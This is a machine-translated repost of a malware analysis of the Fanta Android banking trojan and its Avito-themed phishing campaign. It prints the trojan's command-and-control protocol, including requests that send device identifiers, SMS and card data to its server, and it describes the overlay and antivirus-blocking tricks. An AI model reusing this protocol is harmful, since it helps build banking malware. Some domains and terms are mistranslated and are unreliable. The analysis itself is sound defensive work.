ProHoster > Blog > lajme në internet > Leisya, Fanta: taktika të reja të Trojanit të vjetër Android

Leisya, Fanta: taktika të reja të Trojanit të vjetër Android

Leisya, Fanta: taktika të reja të Trojanit të vjetër Android

Një ditë ju dëshironi të shisni diçka në Avito dhe, pasi të keni postuar një përshkrim të detajuar të produktit tuaj (për shembull, një modul RAM), do të merrni këtë mesazh:

Leisya, Fanta: taktika të reja të Trojanit të vjetër AndroidPasi të hapni lidhjen, do të shihni një faqe në dukje të padëmshme që ju njofton ju, shitësit të lumtur dhe të suksesshëm, se një blerje është bërë:

Leisya, Fanta: taktika të reja të Trojanit të vjetër Android
Pasi të klikoni butonin "Vazhdo", një skedar APK me një ikonë dhe një emër frymëzues besimi do të shkarkohet në pajisjen tuaj Android. Keni instaluar një aplikacion që për ndonjë arsye kërkoi të drejtat e AccessibilityService, më pas u shfaqën disa dritare dhe u zhdukën shpejt dhe... Kjo është ajo.

Ju shkoni për të kontrolluar gjendjen tuaj, por për disa arsye aplikacioni juaj bankar kërkon përsëri të dhënat e kartës suaj. Pas futjes së të dhënave, ndodh diçka e tmerrshme: për disa arsye ende të paqarta për ju, paratë fillojnë të zhduken nga llogaria juaj. Ju po përpiqeni ta zgjidhni problemin, por telefoni juaj reziston: shtyp butonat "Back" dhe "Home", nuk fiket dhe nuk ju lejon të aktivizoni asnjë masë sigurie. Si rezultat, ju mbeteni pa para, mallrat tuaja nuk janë blerë, jeni të hutuar dhe pyesni veten: çfarë ka ndodhur?

Përgjigja është e thjeshtë: ju jeni bërë viktimë e Android Trojan Fanta, një anëtar i familjes Flexnet. Si ndodhi kjo? Le të shpjegojmë tani.

Autorët: Andrey Polovinkin, specialist i ri në analizën e malware, Ivan Pisarev, specialist në analizën e malware.

Disa statistika

Familja Flexnet e Android Trojans u bë e njohur për herë të parë në vitin 2015. Gjatë një periudhe mjaft të gjatë aktiviteti, familja u zgjerua në disa nënspecie: Fanta, Limebot, Lipton, etj. Trojan, si dhe infrastruktura e lidhur me të, nuk qëndrojnë ende: skema të reja efektive të shpërndarjes po zhvillohen - në rastin tonë, faqe phishing me cilësi të lartë që synojnë një përdorues-shitës specifik, dhe zhvilluesit e Trojanit ndjekin tendencat e modës në shkrimi i virusit - shtimi i funksionalitetit të ri që bën të mundur vjedhjen më efikase të parave nga pajisjet e infektuara dhe anashkalimin e mekanizmave mbrojtës.

Fushata e përshkruar në këtë artikull u drejtohet përdoruesve nga Rusia; një numër i vogël i pajisjeve të infektuara u regjistruan në Ukrainë, dhe akoma më pak në Kazakistan dhe Bjellorusi.

Edhe pse Flexnet ka qenë në arenën Android Trojan për më shumë se 4 vjet dhe është studiuar në detaje nga shumë studiues, ai është ende në gjendje të mirë. Duke filluar nga janari 2019, shuma e mundshme e dëmit është më shumë se 35 milion rubla - dhe kjo është vetëm për fushatat në Rusi. Në vitin 2015, versione të ndryshme të këtij Trojan Android u shitën në forume nëntokësore, ku mund të gjendej edhe kodi burimor i Trojanit me një përshkrim të hollësishëm. Kjo do të thotë se statistikat e dëmeve në botë janë edhe më mbresëlënëse. Nuk është një tregues i keq për një burrë kaq të vjetër, apo jo?

Leisya, Fanta: taktika të reja të Trojanit të vjetër Android

Nga shitja në mashtrim

Siç mund të shihet nga fotografia e paraqitur më parë e një faqe phishing për shërbimin e Internetit për postimin e reklamave Avito, ajo ishte përgatitur për një viktimë specifike. Me sa duket, sulmuesit përdorin një nga analizuesit e Avito, i cili nxjerr numrin e telefonit dhe emrin e shitësit, si dhe përshkrimin e produktit. Pas zgjerimit të faqes dhe përgatitjes së skedarit APK, viktimës i dërgohet një SMS me emrin e tij dhe një lidhje në një faqe phishing që përmban një përshkrim të produktit të tij dhe shumën e marrë nga "shitja" e produktit. Duke klikuar në butonin, përdoruesi merr një skedar APK me qëllim të keq - Fanta.

Një studim i domenit shcet491[.]ru tregoi se ai është deleguar te serverët DNS të Hostinger:

  • ns1.hostinger.ru
  • ns2.hostinger.ru
  • ns3.hostinger.ru
  • ns4.hostinger.ru

Skedari i zonës së domenit përmban hyrje që tregojnë adresat IP 31.220.23[.]236, 31.220.23[.]243 dhe 31.220.23[.]235. Megjithatë, rekordi kryesor i burimit të domenit (A rekord) tregon një server me adresë IP 178.132.1[.]240.

Adresa IP 178.132.1[.]240 ndodhet në Holandë dhe i përket hostit WorldStream. Adresat IP 31.220.23[.]235, 31.220.23[.]236 dhe 31.220.23[.]243 ndodhen në MB dhe i përkasin serverit të përbashkët të pritjes HOSTINGER. Përdoret si regjistrues i hapur. Domenet e mëposhtëm u zgjidhën gjithashtu në adresën IP 178.132.1[.]240:

  • sdelka-ru [.] ru
  • tovar-av[.]ru
  • av-tovar [.] ru
  • ru-sdelka [.] ru
  • Shcet382 [.] Ru
  • sdelka221 [.] ru
  • sdelka211 [.] ru
  • vyplata437 [.] Ru
  • viplata291[.]ru
  • perevod273[.]ru
  • perevod901[.]ru

Duhet të theksohet se lidhjet në formatin e mëposhtëm ishin të disponueshme nga pothuajse të gjitha domenet:

http://(www.){0,1}<%domain%>/[0-9]{7}

Ky shabllon përfshin gjithashtu një lidhje nga një mesazh SMS. Bazuar në të dhënat historike, u zbulua se një domen korrespondon me disa lidhje në modelin e përshkruar më sipër, gjë që tregon se një domen është përdorur për të shpërndarë Trojanin tek disa viktima.

Le të hidhemi pak përpara: Trojani i shkarkuar përmes një lidhjeje nga një SMS përdor adresën si një server kontrolli onusedseddohap[.]club. Ky domen është regjistruar më 2019-03-12 dhe duke filluar nga 2019-04-29, aplikacionet APK ndërvepruan me këtë domen. Bazuar në të dhënat e marra nga VirusTotal, gjithsej 109 aplikacione kanë ndërvepruar me këtë server. Vetë domeni u zgjidh në adresën IP 217.23.14 [.] 27, e vendosur në Holandë dhe në pronësi të strehuesit WorldStream. Përdoret si regjistrues emri i lirë. Domenet u zgjidhën gjithashtu në këtë adresë IP keq-rakun[.]klub (duke filluar nga 2018-09-25) dhe Racoon i keq [.] Jeto (duke filluar nga 2018-10-25). Me domen keq-rakun[.]klub ndërvepruan me më shumë se 80 skedarë APK Racoon i keq [.] Jeto - më shumë se 100.

Në përgjithësi, sulmi zhvillohet si më poshtë:

Leisya, Fanta: taktika të reja të Trojanit të vjetër Android

Çfarë ka nën kapakun e Fantas?

Ashtu si shumë Trojan të tjerë Android, Fanta është në gjendje të lexojë dhe të dërgojë mesazhe SMS, të bëjë kërkesa USSD dhe të shfaqë dritaret e veta në krye të aplikacioneve (përfshirë ato bankare). Megjithatë, arsenali i funksionalitetit të kësaj familjeje ka mbërritur: Fanta filloi të përdorej Shërbimi i aksesueshmërisë për qëllime të ndryshme: leximi i përmbajtjes së njoftimeve nga aplikacione të tjera, parandalimi i zbulimit dhe ndalimi i ekzekutimit të një trojan në një pajisje të infektuar, etj. Fanta funksionon në të gjitha versionet e Android jo më të rinj se 4.4. Në këtë artikull do të hedhim një vështrim më të afërt në mostrën e mëposhtme të Fanta-s:

  • MD5: 0826bd11b2c130c4c8ac137e395ac2d4
  • SHA1: ac33d38d486ee4859aa21b9aeba5e6e11404bcc8
  • SHA256: df57b7e7ac6913ea5f4daad319e02db1f4a6b243f2ea6500f83060648da6edfb

Menjëherë pas nisjes

Menjëherë pas nisjes, Trojani fsheh ikonën e tij. Aplikacioni mund të funksionojë vetëm nëse emri i pajisjes së infektuar nuk është në listë:

  • android_x86
  • VirtualBox
  • Nexus 5X (kokë demi)
  • Nexus 5 (rroje)

Ky kontroll kryhet në shërbimin kryesor të Trojan - Shërbimi kryesor. Kur lëshohet për herë të parë, parametrat e konfigurimit të aplikacionit inicializohen në vlerat e paracaktuara (formati për ruajtjen e të dhënave të konfigurimit dhe kuptimi i tyre do të diskutohet më vonë), dhe një pajisje e re e infektuar regjistrohet në serverin e kontrollit. Një kërkesë HTTP POST me llojin e mesazhit do të dërgohet në server regjistro_bot dhe informacione për pajisjen e infektuar (versioni i Android, IMEI, numri i telefonit, emri i operatorit dhe kodi i shtetit në të cilin operatori është regjistruar). Adresa shërben si server kontrolli hXXp://onuseseddohap[.]club/controller.php. Si përgjigje, serveri dërgon një mesazh që përmban fushat bot_id, bot_pwd, server — aplikacioni i ruan këto vlera si parametra të serverit CnC. Parametri server opsionale nëse fusha nuk është marrë: Fanta përdor adresën e regjistrimit - hXXp://onuseseddohap[.]club/controller.php. Funksioni i ndryshimit të adresës CnC mund të përdoret për të zgjidhur dy probleme: për të shpërndarë ngarkesën në mënyrë të barabartë midis disa serverëve (me një numër të madh pajisjesh të infektuara, ngarkesa në një server ueb të pa optimizuar mund të jetë e lartë), dhe gjithashtu për të përdorur një alternativë. server në rast të një dështimi të një prej serverëve CnC.

Nëse ndodh një gabim gjatë dërgimit të kërkesës, Trojani do të përsërisë procesin e regjistrimit pas 20 sekondash.

Pasi pajisja të jetë regjistruar me sukses, Fanta do t'i shfaqë përdoruesit mesazhin e mëposhtëm:

Leisya, Fanta: taktika të reja të Trojanit të vjetër Android
Shënim i rëndësishëm: telefonoi shërbimi Siguria e sistemit — emri i shërbimit Trojan dhe pasi të klikoni butonin në rregull Do të hapet një dritare me cilësimet e aksesueshmërisë së pajisjes së infektuar, ku përdoruesi duhet të japë të drejtat e aksesueshmërisë për shërbimin keqdashës:

Leisya, Fanta: taktika të reja të Trojanit të vjetër Android
Sapo përdoruesi të ndizet Shërbimi i aksesueshmërisë, Fanta fiton akses në përmbajtjen e dritareve të aplikacionit dhe veprimet e kryera në to:

Leisya, Fanta: taktika të reja të Trojanit të vjetër Android
Menjëherë pas marrjes së të drejtave të aksesueshmërisë, Trojan kërkon të drejtat e administratorit dhe të drejtat për të lexuar njoftimet:

Leisya, Fanta: taktika të reja të Trojanit të vjetër Android
Duke përdorur AccessibilityService, aplikacioni simulon goditjet e tasteve, duke i dhënë vetes të gjitha të drejtat e nevojshme.

Fanta krijon shembuj të shumtë të bazës së të dhënave (të cilat do të përshkruhen më vonë) të nevojshme për të ruajtur të dhënat e konfigurimit, si dhe informacionin e mbledhur gjatë procesit në lidhje me pajisjen e infektuar. Për të dërguar informacionin e mbledhur, Trojani krijon një detyrë përsëritëse të krijuar për të shkarkuar fushat nga baza e të dhënave dhe për të marrë një komandë nga serveri i kontrollit. Intervali për hyrjen në CnC caktohet në varësi të versionit Android: në rastin e 5.1, intervali do të jetë 10 sekonda, përndryshe 60 sekonda.

Për të marrë komandën, Fanta bën një kërkesë GetTask te serveri i menaxhimit. Si përgjigje, CnC mund të dërgojë një nga komandat e mëposhtme:

Ekip Përshkrim
0 Dërgo mesazh SMS
1 Bëni një telefonatë ose komandë USSD
2 Përditëson një parametër interval
3 Përditëson një parametër ndërpres
6 Përditëson një parametër sms Manager
9 Filloni të mbledhni mesazhe SMS
11 Rivendos telefonin në cilësimet e fabrikës
12 Aktivizo/çaktivizo regjistrimin e krijimit të kutisë së dialogut

Fanta gjithashtu mbledh njoftime nga 70 aplikacione bankare, sisteme pagese të shpejta dhe kuleta elektronike dhe i ruan ato në një bazë të dhënash.

Ruajtja e parametrave të konfigurimit

Për të ruajtur parametrat e konfigurimit, Fanta përdor një qasje standarde për platformën Android - Preferenca-skedarët. Cilësimet do të ruhen në një skedar me emrin Cilësimet. Një përshkrim i parametrave të ruajtur është në tabelën më poshtë.

emër Vlera e paracaktuar Vlerat e mundshme Përshkrim
id 0 numër i plotë ID-ja e robotit
server hXXp://onuseseddohap[.]club/ URL Kontrolloni adresën e serverit
PAK - Varg Fjalëkalimi i serverit
interval 20 numër i plotë Interval kohor. Tregon për sa kohë duhet të shtyhen detyrat e mëposhtme:

  • Kur dërgoni një kërkesë për statusin e një mesazhi SMS të dërguar
  • Marrja e një komande të re nga serveri i menaxhimit
ndërpres të gjithë të gjitha/Numri tel Nëse fusha është e barabartë me vargun të gjithë ose telNumri, atëherë mesazhi SMS i marrë do të përgjohet nga aplikacioni dhe nuk do t'i shfaqet përdoruesit
sms Manager 0 0/1 Aktivizo/çaktivizo aplikacionin si marrës të parazgjedhur të SMS-ve
readDialog i rremë E vërtetë / e rreme Aktivizo/Çaktivizo regjistrimin e ngjarjeve Ngjarja e aksesueshmërisë

Fanta përdor gjithashtu skedarin sms Manager:

emër Vlera e paracaktuar Vlerat e mundshme Përshkrim
pckg - Varg Emri i menaxherit të mesazheve SMS të përdorur

Ndërveprimi me bazat e të dhënave

Gjatë funksionimit të tij, Trojan përdor dy baza të dhënash. Baza e të dhënave me emër a përdoret për të ruajtur informacione të ndryshme të mbledhura nga telefoni. Baza e dytë e të dhënave quhet Fanta.db dhe përdoret për të ruajtur cilësimet përgjegjëse për krijimin e dritareve phishing të krijuara për të mbledhur informacione rreth kartave bankare.

Trojan përdor bazën e të dhënave а për të ruajtur informacionin e mbledhur dhe për të regjistruar veprimet tuaja. Të dhënat ruhen në një tabelë shkrimet. Për të krijuar një tabelë, përdorni pyetjen e mëposhtme SQL:

create table logs ( _id integer primary key autoincrement, d TEXT, f TEXT, p TEXT, m integer)

Baza e të dhënave përmban informacionin e mëposhtëm:

1. Regjistrimi i nisjes së pajisjes së infektuar me një mesazh Telefoni u ndez!

2. Njoftimet nga aplikacionet. Mesazhi krijohet sipas shabllonit të mëposhtëm:

(<%App Name%>)<%Title%>: <%Notification text%>

3. Të dhënat e kartës bankare nga formularët e phishing të krijuara nga Trojan. Parametri VIEW_NAME mund të jetë një nga këto:

  • AliExpress
  • Avito
  • Google Luaj
  • Të ndryshme <% Emri i aplikacionit%>

Mesazhi është regjistruar në formatin:

[<%Time in format HH:mm:ss dd.MM.yyyy%>](<%VIEW_NAME%>) Номер карты:<%CARD_NUMBER%>; Дата:<%MONTH%>/<%YEAR%>; CVV: <%CVV%>

4. Mesazhet SMS hyrëse/dalëse në formatin:

([<%Time in format HH:mm:ss dd.MM.yyyy%>] Тип: Входящее/Исходящее) <%Mobile number%>:<%SMS-text%>

5. Informacion rreth paketës që krijon kutinë e dialogut në formatin:

(<%Package name%>)<%Package information%>

Tabela shembull shkrimet:

Leisya, Fanta: taktika të reja të Trojanit të vjetër Android
Një nga funksionalitetet e Fanta-s është mbledhja e informacionit për kartat bankare. Mbledhja e të dhënave ndodh përmes krijimit të dritareve të phishing gjatë hapjes së aplikacioneve bankare. Trojani krijon dritaren e phishing vetëm një herë. Informacioni që dritarja iu shfaq përdoruesit ruhet në një tabelë Cilësimet në bazën e të dhënave Fanta.db. Për të krijuar një bazë të dhënash, përdorni pyetjen e mëposhtme SQL:

create table settings (can_login integer, first_bank integer, can_alpha integer, can_avito integer, can_ali integer, can_vtb24 integer, can_telecard integer, can_another integer, can_card integer);

Të gjitha fushat e tabelës Cilësimet si parazgjedhje e inicializuar në 1 (krijo një dritare phishing). Pasi përdoruesi të fusë të dhënat e tij, vlera do të vendoset në 0. Shembull i fushave të tabelës Cilësimet:

  • mund_login — fusha është përgjegjëse për shfaqjen e formularit kur hapni një aplikacion bankar
  • banka e parë - nuk përdoret
  • mund_avito — fusha është përgjegjëse për shfaqjen e formularit kur hapni aplikacionin Avito
  • can_ali — fusha është përgjegjëse për shfaqjen e formularit kur hapni aplikacionin Aliexpress
  • mund_tjetër — fusha është përgjegjëse për shfaqjen e formularit kur hapni ndonjë aplikacion nga lista: Yula, Pandao, Drom Auto, Portofoli. Kartat e zbritjes dhe bonusit, Aviasales, Rezervimet, Trivago
  • kartë_mund — fusha është përgjegjëse për shfaqjen e formularit kur hapet Google Luaj

Ndërveprimi me serverin e menaxhimit

Ndërveprimi i rrjetit me serverin e menaxhimit ndodh nëpërmjet protokollit HTTP. Për të punuar me rrjetin, Fanta përdor bibliotekën popullore Retrofit. Kërkesat dërgohen në: hXXp://onuseseddohap[.]club/controller.php. Adresa e serverit mund të ndryshohet kur regjistroheni në server. Cookies mund të dërgohen si përgjigje nga serveri. Fanta i bën serverit kërkesat e mëposhtme:

  • Regjistrimi i botit në serverin e kontrollit ndodh një herë, me lëshimin e parë. Të dhënat e mëposhtme për pajisjen e infektuar dërgohen në server:
    · Cookie — cookies të marra nga serveri (vlera e parazgjedhur është një varg bosh)
    · mënyrë - konstante e vargut regjistro_bot
    · parashtesë - konstante numër i plotë 2
    · version_sdk — është formuar sipas shabllonit të mëposhtëm: <%Build.MODEL%>/<%Build.VERSION.RELEASE%>(Avit)
    · IMEI — IMEI i pajisjes së infektuar
    · vend — kodi i shtetit në të cilin operatori është i regjistruar, në formatin ISO
    · numër - Numri i telefonit
    · operator - emri i operatorit

    Një shembull i një kërkese të dërguar në server:

    POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Content-Length: 144
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=register_bot&prefix=2&version_sdk=<%VERSION_SDK%>&imei=<%IMEI%>&country=<%COUNTRY_ISO%>&number=<%TEL_NUMBER%>&operator=<%OPERATOR_NAME%>

    Në përgjigje të kërkesës, serveri duhet të kthejë një objekt JSON që përmban parametrat e mëposhtëm:
    · Bot_id — ID e pajisjes së infektuar. Nëse bot_id është e barabartë me 0, Fanta do të riekzekutojë kërkesën.
    bot_pwd — fjalëkalimi për serverin.
    server — kontrolloni adresën e serverit. Parametër opsional. Nëse parametri nuk specifikohet, do të përdoret adresa e ruajtur në aplikacion.

    Shembull i objektit JSON:

    {
    "response":[
   	 {
   		 "bot_id": <%BOT_ID%>,
   		 "bot_pwd": <%BOT_PWD%>,
   		 "server": <%SERVER%>
   	 }
    ],
    "status":"ok"
}

  • Kërkoni të merrni një komandë nga serveri. Të dhënat e mëposhtme dërgohen në server:
    · Cookie — cookies të marra nga serveri
    · Oferta — ID e pajisjes së infektuar që është marrë gjatë dërgimit të kërkesës regjistro_bot
    · PAK -fjalëkalimi për serverin
    · divice_admin — fusha përcakton nëse të drejtat e administratorit janë marrë. Nëse janë marrë të drejtat e administratorit, fusha është e barabartë me 1, përndryshe 0
    · Accessibility — Statusi i funksionimit të Shërbimit të Aksesueshmërisë. Nëse shërbimi është nisur, vlera është 1, përndryshe 0
    · Menaxher SMS — tregon nëse Trojan është aktivizuar si aplikacioni i paracaktuar për marrjen e SMS
    · ekran — tregon se në çfarë gjendje është ekrani. Vlera do të vendoset 1, nëse ekrani është i ndezur, përndryshe 0;

    Një shembull i një kërkese të dërguar në server:

    POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=getTask&bid=<%BID%>&pwd=<%PWD%>&divice_admin=<%DEV_ADM%>&Accessibility=<%ACCSBL%>&SMSManager=<%SMSMNG%>&screen=<%SCRN%>

    Në varësi të komandës, serveri mund të kthejë një objekt JSON me parametra të ndryshëm:

    · Ekip Dërgo mesazh SMS: Parametrat përmbajnë numrin e telefonit, tekstin e mesazhit SMS dhe ID-në e mesazhit që dërgohet. Identifikuesi përdoret kur dërgoni një mesazh në server me tip setSmsStatus. 

    {
    "response":
    [
   	 {
   		 "mode": 0,
   		 "sms_number": <%SMS_NUMBER%>,
   		 "sms_text": <%SMS_TEXT%>,
   		 "sms_id": %SMS_ID%
   	 }
    ],
    "status":"ok"
}

    · Ekip Bëni një telefonatë ose komandë USSD: Numri i telefonit ose komanda vjen në trupin e përgjigjes. 

    {
    "response":
    [
   	 {
   		 "mode": 1,
   		 "command": <%TEL_NUMBER%>
   	 }
    ],
    "status":"ok"
}

    · Ekip Ndryshoni parametrin e intervalit. 

    {
    "response":
    [
   	 {
   		 "mode": 2,
   		 "interval": <%SECONDS%>
   	 }
    ],
    "status":"ok"
}

    · Ekip Ndrysho parametrin e ndërprerjes. 

    {
    "response":
    [
   	 {
   		 "mode": 3,
   		 "intercept": "all"/"telNumber"/<%ANY_STRING%>
   	 }
    ],
    "status":"ok"
}

    · Ekip Ndryshoni fushën SmsManager. 

    {
    "response":
    [
   	 {
   		 "mode": 6,
   		 "enable": 0/1
   	 }
    ],
    "status":"ok"
}

    · Ekip Mblidhni mesazhe SMS nga një pajisje e infektuar.

    {
    "response":
    [
   	 {
   		 "mode": 9
   	 }
    ],
    "status":"ok"
}

    · Ekip Rivendos telefonin në cilësimet e fabrikës: 

    {
    "response":
    [
   	 {
   		 "mode": 11
   	 }
    ],
    "status":"ok"
}

    · Ekip Ndrysho parametrin ReadDialog. 

    {
    "response":
    [
   	 {
   		 "mode": 12,
   		 "enable": 0/1
   	 }
    ],
    "status":"ok"
}

  • Dërgimi i një mesazhi me llojin setSmsStatus. Kjo kërkesë bëhet pasi të ekzekutohet komanda Dërgo mesazh SMS. Kërkesa duket si kjo:

POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=setSmsStatus&id=<%ID%>&status_sms=<%PWD%>

  • Ngarkimi i përmbajtjes së bazës së të dhënave. Një rresht transmetohet për kërkesë. Të dhënat e mëposhtme dërgohen në server:
    · Cookie — cookies të marra nga serveri
    · mënyrë - konstante e vargut setSaveInboxSms
    · Oferta — ID e pajisjes së infektuar që është marrë gjatë dërgimit të kërkesës regjistro_bot
    · tekst — teksti në rekordin aktual të bazës së të dhënave (fusha d nga tavolina shkrimet në bazën e të dhënave а)
    · numër — emri i rekordit aktual të bazës së të dhënave (fusha p nga tavolina shkrimet në bazën e të dhënave а)
    · SMS_MODE - vlera e plotë (fushë m nga tavolina shkrimet në bazën e të dhënave а)

    Kërkesa duket si kjo:

    POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=setSaveInboxSms&bid=<%APP_ID%>&text=<%a.logs.d%>&number=<%a.logs.p%>&sms_mode=<%a.logs.m%>

    Nëse dërgohet me sukses në server, rreshti do të fshihet nga tabela. Shembull i një objekti JSON të kthyer nga serveri:

    {
    "response":[],
    "status":"ok"
}

Ndërveprim me Accessibility Service

AccessibilityService u implementua për t'i bërë pajisjet Android më të lehta për t'u përdorur për personat me aftësi të kufizuara. Në shumicën e rasteve, ndërveprimi fizik kërkohet për të bashkëvepruar me një aplikacion. AccessibilityService ju lejon t'i bëni ato në mënyrë programore. Fanta përdor shërbimin për të krijuar dritare false në aplikacionet bankare dhe për të parandaluar përdoruesit të hapin cilësimet e sistemit dhe disa aplikacione.

Duke përdorur funksionalitetin e AccessibilityService, Trojan monitoron ndryshimet në elementë në ekranin e pajisjes së infektuar. Siç u përshkrua më parë, cilësimet Fanta përmbajnë një parametër përgjegjës për operacionet e regjistrimit me kutitë e dialogut - readDialog. Nëse ky parametër është vendosur, informacioni për emrin dhe përshkrimin e paketës që shkaktoi ngjarjen do të shtohet në bazën e të dhënave. Trojani kryen veprimet e mëposhtme kur aktivizohen ngjarje:

  • Simulon shtypjen e tasteve "back" dhe "home" në rastet e mëposhtme:
    · nëse përdoruesi dëshiron të rindez pajisjen e tij
    · nëse përdoruesi dëshiron të fshijë aplikacionin "Avito" ose të ndryshojë të drejtat e aksesit
    · nëse përmendet aplikacioni "Avito" në faqe
    · kur hapni aplikacionin Google Play Protect
    · kur hapni faqe me cilësimet AccessibilityService
    · kur shfaqet kutia e dialogut të Sigurisë së Sistemit
    · kur hapni faqen me cilësimet "Vizatoni mbi aplikacionin tjetër".
    · kur hapni faqen "Aplikimet", "Rimëkëmbja dhe rivendosja", "Rivendosja e të dhënave", "Rivendosja e cilësimeve", "Paneli i zhvilluesit", "Special. mundësitë”, “Mundësitë e veçanta”, “Të drejtat e veçanta”
    · nëse ngjarja është krijuar nga aplikacione të caktuara.

    Lista e aplikacioneve

    • android
    • Master Lite
    • Master Clean
    • Master i pastër për CPU x86
    • Menaxhimi i lejeve të aplikacionit Meizu
    • Siguria MIUI
    • Clean Master - Antivirus & Cache and Garbage Cleaner
    • Kontrollet prindërore dhe GPS: Kaspersky SafeKids
    • Kaspersky Antivirus AppLock & Web Security Beta
    • Pastrues virusesh, antivirus, pastrues (MAX Security)
    • Mobile Antivirus Security PRO
    • Antivirus Avast dhe mbrojtje falas 2019
    • Siguria celulare MegaFon
    • Mbrojtja AVG për Xperia
    • Siguria celulare
    • Antivirus dhe Mbrojtje Malwarebytes
    • Antivirus për Android 2019
    • Master sigurie - Antivirus, VPN, AppLock, Booster
    • Antivirus AVG për menaxherin e sistemit të tabletave Huawei
    • Aksesueshmëria Samsung
    • Menaxheri i zgjuar i Samsung
    • Mjeshtër i Sigurisë
    • Nxitës i shpejtësisë
    • dr.web
    • Hapësira e Sigurisë Dr.Web
    • Dr.Web Mobile Control Center
    • Dr.Web Security Space Life
    • Dr.Web Mobile Control Center
    • Antivirus & Siguri Mobile
    • Kaspersky Internet Security: Antivirus dhe Mbrojtje
    • Jetëgjatësia e baterisë Kaspersky: Kursuesi dhe përforcuesi
    • Kaspersky Endpoint Security - mbrojtje dhe menaxhim
    • AVG Antivirus falas 2019 – Mbrojtje për Android
    • Antivirus Android
    • Norton Mobile Security dhe Antivirus
    • Antivirus, firewall, VPN, siguri celulare
    • Siguria celulare: antivirus, VPN, mbrojtje nga vjedhjet
    • Antivirus për Android

  • Nëse kërkohet leja kur dërgoni një mesazh SMS në një numër të shkurtër, Fanta simulon klikimin në kutinë e kontrollit Mbani mend zgjedhjen dhe butonin për të dërguar.
  • Kur përpiqeni të hiqni të drejtat e administratorit nga Trojani, ai bllokon ekranin e telefonit.
  • Parandalon shtimin e administratorëve të rinj.
  • Nëse aplikacioni antivirus dr.web zbuloi një kërcënim, Fanta imiton shtypjen e butonit injorojnë.
  • Trojani simulon shtypjen e butonit "back" dhe "home" nëse ngjarja është krijuar nga aplikacioni Kujdesi për pajisjen Samsung.
  • Fanta krijon dritare phishing me formularë për futjen e informacionit në lidhje me kartat bankare nëse hapej një aplikacion nga një listë me rreth 30 shërbime të ndryshme të internetit. Midis tyre: AliExpress, Booking, Avito, Google Play Market Component, Pandao, Drom Auto, etj.

    Format e phishing

    Fanta analizon se cilat aplikacione po funksionojnë në pajisjen e infektuar. Nëse hapet një aplikacion me interes, Trojan shfaq një dritare phishing mbi të gjitha të tjerat, e cila është një formë për të futur informacionin e kartës bankare. Përdoruesi duhet të fusë të dhënat e mëposhtme:

    • Kamerat e reja
    • Data e skadencës së kartës
    • CVV
    • Emri i mbajtësit të kartës (jo për të gjitha bankat)

    Në varësi të aplikacionit që ekzekutohet, do të shfaqen dritare të ndryshme phishing. Më poshtë janë shembuj të disa prej tyre:

    AliExpress:

    Leisya, Fanta: taktika të reja të Trojanit të vjetër Android
    Avito:

    Leisya, Fanta: taktika të reja të Trojanit të vjetër Android
    Për disa aplikacione të tjera, p.sh. Google Play Market, Aviasales, Pandao, Booking, Trivago:
    Leisya, Fanta: taktika të reja të Trojanit të vjetër Android

    Si ishte në të vërtetë

    Për fat të mirë, personi që mori mesazhin SMS të përshkruar në fillim të artikullit doli të ishte një specialist i sigurisë kibernetike. Prandaj, versioni i vërtetë, jo-regjisor, ndryshon nga ai i thënë më parë: një person mori një SMS interesante, pas së cilës ia dha ekipit të Inteligjencës së Gjuetisë së Kërcënimeve Group-IB. Rezultati i sulmit është ky artikull. Fund i lumtur, apo jo? Sidoqoftë, jo të gjitha historitë përfundojnë me kaq sukses, dhe në mënyrë që e juaja të mos duket si prerja e një regjisori me humbje parash, në shumicën e rasteve mjafton t'u përmbaheni rregullave të përshkruara më gjatë:

    • mos instaloni aplikacione për një pajisje celulare me OS Android nga asnjë burim tjetër përveç Google Play
    • Kur instaloni një aplikacion, kushtojini vëmendje të veçantë të drejtave të kërkuara nga aplikacioni
    • kushtojini vëmendje shtesave të skedarëve të shkarkuar
    • instaloni rregullisht përditësimet e sistemit operativ Android
    • mos vizitoni burime të dyshimta dhe mos shkarkoni skedarë nga atje
    • Mos klikoni në lidhjet e marra në mesazhet SMS.

Burimi: www.habr.com

Shto një koment